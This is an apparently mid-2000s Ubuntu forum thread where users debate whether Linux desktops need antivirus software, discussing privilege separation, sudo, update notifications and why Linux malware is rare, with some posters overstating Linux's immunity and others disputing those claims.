The reason they didn't (mainly) is usability. Joe Sixpack doesn't want to be told they can't do xyz because of their access rights (think - if your computer at home told you "na-na, can't do that" - wouldn't you feel a tad annoyed? Especially if there's no-one "tech" enough to explain why?) - they just want to do it. Hence people just clicking "OK" or "Yes" to every dialog box they are presented with.

PCs in the workplace are different. You expect to be told that you can't access x or do y because of the user id you are - think of huge corps with 1000's of machines, or even small companies with <50 - it's the same thing, not every user is an admin). For example, would you expect to be able to access the same resources as somebody on the board of directors? Or your boss? No, probably not, so you accept being told that certain things are off-limits.

An ideal world would mean bringing some of this work-based mentality home, and accepting that just because it's your PC doesn't mean you deserve to be running as an admin user on it all the time, allowing anything to run and do what it wants. This is where the Unix-based OSes rule - no "root" desktop sessions by default, for example, meaning even if some malicious code did get executed, there's only a single user affected, not compromising the whole system.

I read the articles some people quoted. I understand better why linux is seemingly immune to viruses - although i wouldn't say i was convinced - yet. So i'll pick up on a different point i made - automatic updates. Microsoft discovered the hard way that people can't be trusted to update, and so turned it on by default in SP2. Now Ubuntu seems to be making that same 'mistake'. comments?

Another thing - this is probably a noobish question: The article on The Register states that email attachments are less dangerous because you would first have to give the file executable permissions before you could run it. Sounds good. But what if I create an executable file in linux and email to another linux user? Is it not executable to them any more?

Ubuntu doesn't update for you, it just tells you when you have updates to install. Whether you consider it good or bad is mostly preference.

I read the articles some people quoted. I understand better why linux is seemingly immune to viruses - although i wouldn't say i was convinced - yet. So i'll pick up on a different point i made - automatic updates. Microsoft discovered the hard way that people can't be trusted to update, and so turned it on by default in SP2. Now Ubuntu seems to be making that same 'mistake'. comments?

Well The Ubuntu update is a Large orange Icon the appears in the top task bar that tells you that there are updates, Now with windows I will mention that it still was not turned un by defualt it just asked and most people click yes and Windows people tend to do. I for one have done every Update that comes down the pipe simply because the Icon annyoed me.

I find this whole topic really interesting. Gradually, I'm managing to detach myself from the Windows way of thinking (I am a newbie after all) - but this whole Linux not being a victim of viruses totally bewilders me (In a good way I might add). I did have big concerns over viruses (After all, I still dont know any better really) and this thread has helped me put that fear to the back of my mind.

I guess its a risk you take for granted when using Windows, and its an easy assumption to make that Linux will fall fowl to the same fate sometimes. Is it purely the added security/admin restrictions on Linux that prevent it!? Just very good programming!? Is it the hackers dedication to annoying the hell out of Bill Gates!? lol - Either way I'm happy I guess... :)

I've only got a couple of things to straighten up on my Ubuntu OS and I will be as happy as larry!

You didn't answer my question though: Why is it not considered complacent to run without anti-virus?

If i were to install Ubuntu 7.04 on a relatives PC, and leave it with them, without anti-virus, and updates not on automatic, and i went back 5/6 years later (expected life of a family pc), can i really expect it to be virus free, after that long?

Simple. No viruses have been developed for Linux, and because of the way security works in Linux, it would be very difficult for one to do any real damage, such as using root privlages.

On the otherhand, unauthorized access to your computer is possible. Instead of running AntiVirus, I would use Firestarter Firewall. Get it here: http://www.fs-security.com/.

Simple. No viruses have been developed for Linux

Now that's what I'm getting at. That statement is simply not true. But the sentiment is echoed by a number of posts i've read here - there's a confidence in Linux (given it's excellent track record), and it seems to me like it's leading to arrogance, and thus to complacency among its users.

Statements like that are what leads me to question security in Linux in the first place.

Just because some users are ignorant doesn't mean the OS is insecure. Well. it does in Windows, but not here. Viruses have of course been developed for every OS, the difference is that in *Nix systems, nobody has really been successful at spreading them. This is probably mostly because *nix is much more secure than windows, but also because *nix users are in general more cautious. How many times have you heard of someone ruining their Win* box by opening some random attachment or blindly following links? 99% of all *nix users are the kind of people that laugh at them, and the other 1% wouldn't know how to screw up their system if they tried.

The big thing that keeps linux safe is the fact that the source code is open. While this might seem like it's inviting hackers in to see your flaws, it really is a way for other people to point out flaws. Compare Windows, where only a small group of people ever see the code, to Linux, where hundreds and thousands of people can look at it, so that errors are eventually weeded out. This is well known as "The Cathedral and the Bazaar" models, because of a book about it, and as Linus's Law, which is something like "With enough eyes, all bugs are shallow."

It's been researched and proven that, on average, Open Source source code has many less errors per line of code than closed source.

I run red hat router for 5 years now, yet no viruses.
ubuntu desktop for 2 years, zero virus.
surely there are viruses for linux, but
when you run anti virus, anti spy ware, auto update, firewall, it doest not matter much when you use good hardware, maybe, but running without them is surely faster, not mentioning with old hardware, running them is will slow the system down significanly, so it's not a good practice.
I left my 2004 ubuntu release un-update, and it still working pretty well now. It is not arrogance, but this is one of main advantages of using linux over windows. Surely updates are needed, but i'm a bit more lazy and less paranoid, so if it not broken, i dont see any reason to fix it.
I dunno, may be you fell that this is kind a good to be true, but I use xp without any anti virus (you know how much a good anti virus cost?), and it only need 30 minute online for viruses to get to the system, compared with 2 years virus free ubuntu hoary ( you see I join this forum in 2005). All I can say is that you should experience by your self, if some virus get in your system, then fix 'em. It would'nt kill you, it can be fun..

running them is will slow the system down significanly, so it's not a good practice.

lol - what a quote. I'm keeping that one for when this all comes back to bite me.

I have a question.
If you use the sudo command, aren't you installing as root?
In that case are you making changes to the entire system or still only to your account?
So if I seriously mess up, will I only mess up my account, and not that of the other users?
letś say I edit my xorg.conf.
That file is not in my home directory, but in a system directory. Did i screw it up for everybody?
Is there a way to guarantee security in this case? Cause if I work as root, I will always screw things up cause I have the authorization.

Now that's what I'm getting at. That statement is simply not true. But the sentiment is echoed by a number of posts i've read here - there's a confidence in Linux (given it's excellent track record), and it seems to me like it's leading to arrogance, and thus to complacency among its users.

Statements like that are what leads me to question security in Linux in the first place.

I would agree and dislike it when people make this comment as well because it is not true. Although I Think a better example would be the Linux Ipod Virus that was being talked about not to long ago and it was so hard to get the virus to work the way it was intended to that many people attempting to implement this Proof of Consept Virus just gave up.

In short it can be done but you gotta work really hard for it to work.

I have a question.
If you use the sudo command, aren't you installing as root?
In that case are you making changes to the entire system or still only to your account?
So if I seriously mess up, will I only mess up my account, and not that of the other users?
letś say I edit my xorg.conf.
That file is not in my home directory, but in a system directory. Did i screw it up for everybody?
Is there a way to guarantee security in this case? Cause if I work as root, I will always screw things up cause I have the authorization.

Sudo Basically does make you Root for a short time but the idea is that it is only when you wish to change something system wide, As for Virus/Spyware they would need your password to Infect the whole system. The important thing is you are not always Root or Admin only when you tell the computer you need to be.

So, Linux viruses are very very rare. And the biggest issue is your system being compromised. How will being behind a router stop this?

Are people saying that a virus scanner is basically pointless as it will never find anything; so just update your box when your asked to?

Maybe add a poll to see if people recommend a virus checker or not?!

First of all Linux/Unix viruses are extremely rare and most of the existing ones won't do any damage to a modern Unix-based operating system:

http://en.wikipedia.org/wiki/List_of_Linux_computer_viruses

This explains why:

http://librenix.com/?inode=21

Third, you only need a virus scanner to possibly protect other Windows clients in your local network against potential spreading of viruses designed for Windows.

Last but not least, a firewall offers no protection against viruses at all. That's a common misconception.

So to conclude... you might consider a virus scanner but I have learned my lesson: You simply don't need them.

I think a poll would show that the majority of Linux user's don't advocate using anti-virus (going by this thread). Which is crazy to me, regardless of how few there have been in the past, or how well Linux is built. Not even "just in case".

I think a poll would show that the majority of Linux user's don't advocate using anti-virus (going by this thread). Which is crazy to me, regardless of how few there have been in the past, or how well Linux is built. Not even "just in case".
Get used to it. A user once told me that it is like wearing an umbrella in the desert (can't remember his name). And he was right. What harm can a virus do to you at this stage? Probably none at all. So why bother?

At some point this may change but I deem it very unlikely. Until then I am happy without an anti-virus program (although I have got one that I run once in a while - just in case).

No one has mentioned that Virus scanners suck at finding viruses specifically not in their library and virus scanners even on linux only detect windows viruses because that's what is in the wild.

Basically if you run a virus scanner in linux it won't pick up a linux virus anyways at this point. And if a linux virus does come about, x number of people will be infected before it is properly discovered and guarded against. Then it WILL be in the news, and the community will most likely patch the hole before actually resorting to a virus scanner.

Running a virus scanner does not make you less vulnerable to a new linux virus.

I think a poll would show that the majority of Linux user's don't advocate using anti-virus (going by this thread). Which is crazy to me, regardless of how few there have been in the past, or how well Linux is built. Not even "just in case".

let's think about it like this. if you're one on the many idiots who write viruses, and wanna get the most bang for your buck, who are you going to target? well since 90%+ of the worlds computers run a microsoft operating system, that seems like the place to be. going after the average un-tech savey home computer user running windows with no anti-virus protection, or the copy of norton or mcafee that came pre-loaded on their computer and expired several years ago. or going after the very low installed base of mac and linux users?

Are there any antivirus programs for Linux? I don't know of any.

Are there any antivirus programs for Linux? I don't know of any.

yep, there's several out there, go to google and type in linux antivirus software, and see what comes up.

let's think about it like this. if you're one on the many idiots who write viruses, and wanna get the most bang for your buck, who are you going to target? well since 90%+ of the worlds computers run a microsoft operating system, that seems like the place to be. going after the average un-tech savey home computer user running windows with no anti-virus protection, or the copy of norton or mcafee that came pre-loaded on their computer and expired several years ago. or going after the very low installed base of mac and linux users?

I would argue this based on that the home user is not the only tastey target. Many Many High end servers run on linux and could do mass damage to a number of windows people based on keep them from need services. Yet it is still not a major problem So although I agree to a point it is hardly the major factor.

Are there any antivirus programs for Linux? I don't know of any.

AVG & Avast to name 2 Both have Linux Versions.

I think a poll would show that the majority of Linux user's don't advocate using anti-virus (going by this thread). Which is crazy to me, regardless of how few there have been in the past, or how well Linux is built. Not even "just in case".

If you are so concerned about viruses in linux then I say go ahead and download and run a linux antivirus software. When I first switched to Ubuntu I had the same concerns about viruses and after being a faithful XP user I got used to being required to using security software to keep my XP safe. I went and got the free linux avg antivirus software and ran it about once a week. After getting more familiar with Ubuntu and doing some reading here in the forums I now rarely use it as its really a waste of time as no viruses are ever found. But if it does make you feel more comfortable go ahead and get security software and use it and hopefully over time you will get to the point I am at and not use it at all.